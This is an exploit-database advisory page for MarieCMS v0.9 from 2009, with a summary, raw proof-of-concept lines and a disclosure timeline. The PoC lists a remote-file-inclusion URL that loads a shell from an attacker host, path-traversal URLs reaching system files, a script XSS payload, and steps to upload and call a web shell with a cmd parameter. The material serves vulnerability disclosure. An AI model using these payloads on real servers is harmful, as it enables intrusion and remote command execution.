header-logo
Suggest Exploit
vendor:
MarieCMS
by:
No Author
7.5
CVSS
HIGH
Remote File Inclusion, Local File Inclusion, Persistent XSS and Shell Upload (Authenticated User)
94, 98, 79, 264
CWE
Product Name: MarieCMS
Affected Version From: 0.9
Affected Version To: 0.9
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

MarieCMS v0.9 vulnerable to Remote File Inclusion, Local File Inclusion, Persistent XSS and Shell Upload (Authenticated User)

MarieCMS v0.9 is vulnerable to Remote File Inclusion, Local File Inclusion, Persistent XSS and Shell Upload (Authenticated User). For Remote File Inclusion, an attacker can send a malicious URL to the vulnerable server in the page parameter. For Local File Inclusion, an attacker can send a malicious URL to the vulnerable server in the mod parameter. For Persistent XSS, an attacker can put a malicious script in the Name field on the page http://server/mariecms/?page=addgb&mod=gaestebuch. For Shell Upload (Authenticated User), an attacker can rename shell.php to shell.jpg.php and upload it into the galleryupload section. Then, the attacker can view images to get the image id for shell.jpg.php and access the shell.

Mitigation:

The vendor should be contacted to patch the vulnerability.
Source

Exploit-DB raw data:

############
 OVERVIEW
############

MarieCMS v0.9 vulnerable to following issues:

++ Remote File Inclusion
++ Local File Inclusion
++ Persistent XSS
++ Shell Upload (Authenticated User)

######################
 PoC
######################

# Remote File Inclusion:
++++++++++++++++++++++++

http://server/mariecms/?page=http://[attacker]/[site]/shell.txt?

# Local File Inclusion:
+++++++++++++++++++++++

http://server/mariecms/?mod=../../../../../../../../../../boot.ini%00
http://server/mariecms/admin/index.php?mod=../../../../../../../../../../../../boot.ini%00

# Persistent XSS:
+++++++++++++++++

Put <script>alert("XSS")</script> in "Name" field on page
http://server/mariecms/?page=addgb&mod=gaestebuch

# Shell Upload (Authenticated User):
+++++++++++++++

1. Rename shell.php to shell.jpg.php
2. Upload it into galleryupload section.
3. View images to get image id for shell.jpg.php
4. Access shell:
http://[server]/[path]/_images/[image_id].php?cmd=dir



############
 TimeLine
############

Bug discovered 			: 26/11/2009
Informed Vendor			: 30/11/2009 -- No reply received from vendor till the date
Public Disclosure		: 02/12/2009

Navigation

Suggest Exploit

Services By CQR